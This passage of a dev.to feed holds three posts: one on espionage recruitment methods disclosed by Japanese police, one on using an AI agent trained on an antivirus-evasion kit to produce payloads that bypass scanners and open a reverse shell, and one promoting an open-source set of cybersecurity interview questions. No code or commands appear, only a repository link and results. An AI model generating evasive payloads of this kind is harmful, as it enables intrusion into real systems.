&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fw1k8ajlq44o6jwi5a1yj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fw1k8ajlq44o6jwi5a1yj.png" alt=" " width="800" height="423"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This initial encounter is followed by a prolonged period of social engagement, often involving repeated dinners and social gatherings over several months. The goal is to cultivate a relationship based on trust and personal rapport, with the operational handler investing significant time in emotional bonding. The case of a machinery manufacturer in early 2026 involved an individual posing as Ukrainian, whose actual affiliation was with a foreign intelligence service, who leveraged more than ten social engagements in the Tokyo metropolitan area to gain access to commercial secrets.&lt;/p&gt;

&lt;h3&gt;
  
  
  The "Foot-in-the-Door" Technique
&lt;/h3&gt;

&lt;p&gt;The psychological manipulation at the core of this strategy is the "foot-in-the-door" technique. Handlers systematically escalate their requests, beginning with trivial demands such as publicly available promotional materials or non-sensitive data, often offering small payments for compliance.&lt;/p&gt;

&lt;p&gt;Once a pattern of cooperation is established, the requests gradually become more sensitive. This incremental process methodically dismantles an individual's psychological defences, making it significantly more difficult for the target to refuse subsequent, more egregious requests. By the time the target recognises the severity of the situation, they are often already deeply compromised.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Role of Social Media
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fi6n2ip088kliglfovnea.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fi6n2ip088kliglfovnea.png" alt=" " width="800" height="439"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Social media platforms, particularly professional networking sites, provide a low-cost and highly effective vector for these operations. A significant case from 2018 involved an employee who was contacted by a foreign national who expressed admiration for their published academic paper. This led to a deepening professional dialogue, which eventually culminated in an invitation for a face-to-face meeting abroad and the subsequent exchange of sensitive information.&lt;/p&gt;

&lt;p&gt;The information made publicly available on social media—such as professional history, job descriptions, and personal details—is actively collected and used to build comprehensive profiles of potential targets. A clear understanding of an individual's personal and family circumstances also provides handlers with potential leverage for future coercion.&lt;/p&gt;

&lt;h2&gt;
  
  
  Vulnerabilities in the Corporate Environment
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Danger of "Secure" Spaces
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fasoxx1q5wvi9mn9ihl0b.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fasoxx1q5wvi9mn9ihl0b.png" alt=" " width="800" height="449"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A critical vulnerability exists during business travel. When employees leave their organisation's secure environment and stay in hotels, they become more exposed to a variety of contact and penetration methods. Roles such as cleaners, maintenance staff, and room service personnel provide easy, unsuspicious access to a target's room and personal effects.&lt;/p&gt;

&lt;p&gt;It is advised that hotel safes offer insufficient protection against a coordinated and determined adversary. Any electronic device, particularly laptops, left unattended for even a short period in a hotel room should be considered compromised.&lt;/p&gt;

&lt;h3&gt;
  
  
  Institutional and Personal Negligence
&lt;/h3&gt;

&lt;p&gt;While security protocols are increasingly robust, the most significant weaknesses are frequently found at the individual level. The documented cases demonstrate that successful espionage almost invariably relies on an individual's failure to maintain vigilance and their gradual compromise, often without their conscious awareness. Professional expertise is not synonymous with identity verification or security awareness; even seemingly benign academic exchanges can be the initial stage of a targeting operation.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Japanese Institutional Response
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Accelerated Legal and Institutional Framework
&lt;/h3&gt;

&lt;p&gt;Japan has enacted a rapid and comprehensive legislative response to these threats. Over the past three years, it has moved from policy initiatives to a fully operational security framework, including:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Enactment of relevant legislation.&lt;/li&gt;
&lt;li&gt;Implementation of the "Important Economic Security Information" protection system.&lt;/li&gt;
&lt;li&gt;Establishment of a patent non-disclosure review mechanism.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Comprehensive Risk Management
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fq2tc17l619zafh9brlwq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fq2tc17l619zafh9brlwq.png" alt=" " width="800" height="435"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This new framework extends to core supply chain technology management, mandatory background checks for personnel with access to classified information, and stringent "deemed export" regulations concerning foreign employees. All activities, including joint research ventures, capital collaboration, and requests for samples, are now systematically assessed against a unified risk checklist.&lt;/p&gt;

&lt;p&gt;This means that even activities conducted with entirely legitimate intentions may be subject to review and cause increased compliance costs if their behavioural patterns resemble those seen in known espionage cases.&lt;/p&gt;

&lt;h2&gt;
  
  
  Counter-Intelligence Implications and Self-Protection
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Information as a Defence Tool
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fsadel6hlp3zjm1bfzlz0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fsadel6hlp3zjm1bfzlz0.png" alt=" " width="800" height="385"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The decision by Japanese police to publicly disclose these operational details represents a strategic counter-intelligence measure. By disseminating information on how these methods operate, their covert nature is diminished, thereby reducing their overall success rate. This approach leverages transparency as a defensive tool, rather than relying solely on traditional law enforcement resources.&lt;/p&gt;

&lt;h3&gt;
  
  
  Personal-Level Protective Measures
&lt;/h3&gt;

&lt;p&gt;Key protective measures for individuals include:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Maintaining physical control of electronic devices at all times, especially during travel.&lt;/li&gt;
&lt;li&gt;Avoiding the storage of sensitive information on devices used while travelling.&lt;/li&gt;
&lt;li&gt;Regularly auditing and limiting the amount of personal and professional information shared on social media platforms.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Avoiding Oversimplification
&lt;/h3&gt;

&lt;p&gt;It is important to note that, in the disclosed cases, a diverse range of nationalities are represented among the perpetrators. Therefore, it would be inaccurate to generalise these threats as emanating from a single source. Counter-intelligence is a multi-faceted challenge requiring a comprehensive and global threat awareness framework.&lt;/p&gt;

&lt;h2&gt;
  
  
  Concluding Remarks and Further Analysis
&lt;/h2&gt;

&lt;p&gt;This briefing provides an overview of the modus operandi identified by Japanese authorities. The underlying psychological principles, the detailed legal applications, and a comprehensive risk checklist for individuals and corporations operating in Japan require a more thorough analysis.&lt;/p&gt;

</description>
      <category>security</category>
      <category>cybersecurity</category>
      <category>intelligence</category>
      <category>recruitment</category>
    </item>
    <item>
      <title>Using AI to Evade Antivirus Software: A Straightforward Approach</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Sat, 15 Aug 2026 19:40:36 +0000</pubDate>
      <link>https://dev.to/excalibra/using-ai-to-evade-antivirus-software-a-straightforward-approach-11o2</link>
      <guid>https://dev.to/excalibra/using-ai-to-evade-antivirus-software-a-straightforward-approach-11o2</guid>
      <description>&lt;p&gt;&lt;strong&gt;Article Summary:&lt;/strong&gt; This piece demonstrates the process of leveraging an AI agent trained on the AVEvasionKit project from GitHub to achieve antivirus evasion. The author conducted tests within a Kali environment and found that the AI-generated solutions successfully bypassed both online scanning engines and local security software such as Huorong, subsequently enabling a successful reverse shell connection. The article underscores how AI reduces the barrier to entry for security research; however, it remains largely superficial in its treatment of the underlying technical principles, serving primarily as a rudimentary conceptual reference.&lt;/p&gt;




&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F1v938aufc2vvhxof9m20.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F1v938aufc2vvhxof9m20.png" alt=" " width="800" height="421"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h1&gt;
  
  
  Using AI to Evade Antivirus Software: A Straightforward Approach
&lt;/h1&gt;

&lt;blockquote&gt;
&lt;p&gt;In this era of flourishing artificial intelligence, our work and daily lives have been enriched with boundless opportunities and enjoyment. Concurrently, this technological wave has introduced novel approaches to the study of cybersecurity.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Previously, within our testing environments, circumventing security software demanded considerable ingenuity and effort. Now, however, one need only distil the insights of others into actionable skills.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Warning:&lt;/strong&gt; This article is intended solely for educational and research purposes. We firmly oppose any activity that compromises network security. Any legal liability arising from misuse rests solely with the individual perpetrator.&lt;/p&gt;




&lt;h2&gt;
  
  
  Deployment and Learning
&lt;/h2&gt;

&lt;p&gt;We shall now instruct the AI to acquire relevant competencies, using the &lt;em&gt;AV Evasion Kit&lt;/em&gt; project as our case study.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Project Repository:&lt;/strong&gt; &lt;a href="https://github.com/Excalibra/av-evasion-kit" rel="noopener noreferrer"&gt;https://github.com/Excalibra/av-evasion-kit&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fjeteemsb4gaj3mrk8668.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fjeteemsb4gaj3mrk8668.png" alt=" " width="800" height="523"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F1tmms4gj9gua5m6letdx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F1tmms4gj9gua5m6letdx.png" alt=" " width="800" height="529"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;It is advisable to phrase instructions to the AI agent in clear, straightforward language. One should also be mindful that certain operations may trigger safety warnings, requiring a degree of circumspection.&lt;/p&gt;

&lt;p&gt;Upon successful skill acquisition, we proceed to validate the implementation.&lt;/p&gt;




&lt;h2&gt;
  
  
  Initial Testing
&lt;/h2&gt;

&lt;p&gt;Subsequently, we conducted verification of the deployed skills within a Kali Linux environment.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F83o73iaofecciusw0rwi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F83o73iaofecciusw0rwi.png" alt=" " width="800" height="530"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Pay careful attention to the precision of your descriptive prompts.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fbe6cepajh1jz6jbmfd7l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fbe6cepajh1jz6jbmfd7l.png" alt=" " width="800" height="531"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ftplih3zny3w8jkw84w5c.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ftplih3zny3w8jkw84w5c.png" alt=" " width="800" height="528"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Online Scanning:&lt;/strong&gt; The generated payload evaded detection by popular online antivirus scanners.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F998h5175g7gimm322g8o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F998h5175g7gimm322g8o.png" alt=" " width="800" height="421"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Local Protection (Huorong):&lt;/strong&gt; The payload successfully bypassed Huorong's active protection mechanisms.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fy7bldptp34zzx4ljynwu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fy7bldptp34zzx4ljynwu.png" alt=" " width="799" height="527"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Callback Achieved:&lt;/strong&gt; A reverse shell connection was successfully established, confirming execution.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fp65luqex1l4shpuyjcbq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fp65luqex1l4shpuyjcbq.png" alt=" " width="800" height="532"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Through this experimental process, it becomes evident that artificial intelligence offers a remarkably accessible entry point into cybersecurity research. Much like human cognition, AI operates through continuous learning and iterative refinement. With dedication and sustained curiosity, mastery becomes an attainable objective.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Disclaimer:&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The procedures and technical methodologies described herein are published solely for the purpose of lawful security research and pedagogical instruction, with the explicit aim of enhancing defensive capabilities. They are intended for academic and technical exploration.&lt;/p&gt;

&lt;p&gt;Any individual or organisation that employs the contents of this article for unauthorised, malicious, or otherwise unlawful activities shall bear full legal liability, civil compensation, and any associated consequences.&lt;/p&gt;
&lt;/blockquote&gt;




</description>
      <category>evasion</category>
      <category>cybersecurity</category>
      <category>ai</category>
      <category>security</category>
    </item>
    <item>
      <title>How I Went From Interview Rejections to Building a 200+ Question Open‑Source Cybersecurity Resource</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Sat, 25 Jul 2026 11:26:33 +0000</pubDate>
      <link>https://dev.to/excalibra/how-i-went-from-interview-rejections-to-building-a-200-question-open-source-cybersecurity-resource-2m4f</link>
      <guid>https://dev.to/excalibra/how-i-went-from-interview-rejections-to-building-a-200-question-open-source-cybersecurity-resource-2m4f</guid>
      <description>&lt;p&gt;&lt;strong&gt;And why I’m giving it away for free.&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fm3py01llfm77f91n6kys.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fm3py01llfm77f91n6kys.png" alt=" " width="800" height="869"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I remember the exact moment I realised I was doing interview prep all wrong.&lt;/p&gt;

&lt;p&gt;I had just finished yet another technical interview that I thought went well. I knew the CIA triad. I could explain SQL injection. I’d even practised my STAR method answers.&lt;/p&gt;

&lt;p&gt;Then the interviewer asked: &lt;em&gt;“Walk me through how you’d respond to a ransomware outbreak across 200 servers.”&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I froze.&lt;/p&gt;

&lt;p&gt;Not because I didn’t know the answer — but because I’d never &lt;em&gt;thought&lt;/em&gt; about interviews that way. I’d been memorising definitions when I should have been learning how security professionals actually &lt;em&gt;think&lt;/em&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Problem With Most Interview Prep
&lt;/h2&gt;

&lt;p&gt;Here’s the reality: &lt;strong&gt;most cybersecurity interview resources are a mess.&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Scattered PDFs that are years out of date&lt;/li&gt;
&lt;li&gt;Random blog posts with conflicting answers&lt;/li&gt;
&lt;li&gt;Paywalled courses that cost hundreds of pounds&lt;/li&gt;
&lt;li&gt;Practice questions with no explanations — just “here’s the right answer, trust us”&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Sound familiar?&lt;/p&gt;

&lt;p&gt;I wasted months bouncing between these. Every time I thought I was prepared, a curveball question would expose another gap. I was building my knowledge on shaky foundations — and interviewers could tell.&lt;/p&gt;

&lt;p&gt;So I did what any frustrated engineer would do.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;I built my own.&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Enter: 200+ Cybersecurity Interview Questions (Free &amp;amp; Open Source)
&lt;/h2&gt;

&lt;p&gt;After six months of collecting, curating, and validating, I’m releasing what I wish I’d had from day one:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;A free, open‑source collection of 200+ cybersecurity interview questions and answers.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F8ok4p8x0e5s4iwx3128f.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F8ok4p8x0e5s4iwx3128f.png" alt=" " width="800" height="869"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here’s what makes it different:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;No fluff.&lt;/strong&gt; Every question is practical and interview‑relevant.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Organised by domain&lt;/strong&gt; — Red Team, Blue Team, Web Security, Incident Response, Network Security, Systems, Tools, and more.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Searchable live website&lt;/strong&gt; — find topics instantly, no scrolling through a massive README.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Continuously updated&lt;/strong&gt; — this isn’t a one‑and‑done PDF. It’s a living resource that grows with the community.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Completely free.&lt;/strong&gt; No paywalls, no email sign‑ups, no tricks.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://excalibra.github.io/cybersecurity-interview-questions/" rel="noopener noreferrer"&gt;excalibra.github.io/cybersecurity-interview-questions&lt;/a&gt;&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
&lt;strong&gt;&lt;a href="https://github.com/Excalibra/cybersecurity-interview-questions" rel="noopener noreferrer"&gt;github.com/Excalibra/cybersecurity-interview-questions&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  What’s Inside?
&lt;/h2&gt;

&lt;p&gt;The repository is organised into logical sections so you can focus on what matters most for your next interview:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Section&lt;/th&gt;
&lt;th&gt;What You’ll Find&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Red Team&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Exploitation, evasion, deserialisation, WAF bypass, domain attacks, persistence&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Blue Team&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Incident response, log analysis, intrusion detection, traceability, system hardening&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Web Security&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;SQLi, XSS, CSRF, SSRF, file uploads, logic flaws&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Network Security&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;ARP, DNS, TCP/UDP, DDoS, OSI model, routing protocols, firewalls, SSL/TLS&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Incident Response&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Threat intelligence, malware detection, honeypots, forensic analysis&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Internal Network Penetration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Lateral movement, domain controller attacks, golden/silver tickets, tunnelling&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Systems&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Windows/Linux hardening, privilege escalation, persistence detection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Tools&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Nmap, sqlmap, webshells, proxies, tunnelling tools&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Computer Networks&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;OSI model, TCP/IP fundamentals&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Traceability &amp;amp; Traffic Analysis&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Wireshark, traffic patterns, attack attribution&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;And yes — I recently added a &lt;strong&gt;dedicated Blue Team section&lt;/strong&gt; with 70+ questions. Because defence matters just as much as offence.&lt;/p&gt;




&lt;h2&gt;
  
  
  Why Open Source?
&lt;/h2&gt;

&lt;p&gt;I could have packaged this as a course or a paid PDF. But that’s exactly the problem I’m trying to solve.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Interview prep should be accessible to everyone.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;By keeping it open source:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Anyone can use it, fork it, or contribute.&lt;/li&gt;
&lt;li&gt;The community can catch mistakes and suggest improvements.&lt;/li&gt;
&lt;li&gt;It stays relevant because it evolves with real‑world feedback.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If you find a question that’s unclear, an answer that could be better, or a topic that’s missing — &lt;strong&gt;open an issue or submit a pull request.&lt;/strong&gt; This resource is for the community, and the community makes it better.&lt;/p&gt;




&lt;h2&gt;
  
  
  What People Are Saying
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;“I wish I had this when I was preparing for my first security role.”&lt;/em&gt;&lt;br&gt;&lt;br&gt;
— Anonymous Reddit user&lt;/p&gt;

&lt;p&gt;&lt;em&gt;“Finally, a resource that actually explains *why&lt;/em&gt; the answer is what it is.”*&lt;br&gt;&lt;br&gt;
— Early contributor&lt;/p&gt;

&lt;p&gt;&lt;em&gt;“The searchable live site is a game‑changer. No more scrolling through endless Markdown files.”&lt;/em&gt;&lt;br&gt;&lt;br&gt;
— Community member&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  How You Can Help
&lt;/h2&gt;

&lt;p&gt;If this resource helps you, here are a few ways to give back:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;⭐ Star the repository&lt;/strong&gt; — it helps others discover it.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Share it&lt;/strong&gt; — with your network, on LinkedIn, Reddit, or Discord.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Contribute&lt;/strong&gt; — open an issue or PR with improvements.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Use it&lt;/strong&gt; — and let me know what topics you’d like to see next.&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  One Last Thing
&lt;/h2&gt;

&lt;p&gt;Interview prep isn’t about memorising trivia. It’s about building the mental models that help you think like a security professional.&lt;/p&gt;

&lt;p&gt;This repository won’t guarantee you a job. But it will give you a structured, practical foundation — so when the interviewer throws a curveball, you’re ready.&lt;/p&gt;

&lt;p&gt;Not because you memorised the answer.&lt;br&gt;&lt;br&gt;
But because you understand &lt;em&gt;why&lt;/em&gt; it’s the answer.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Check it out here:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
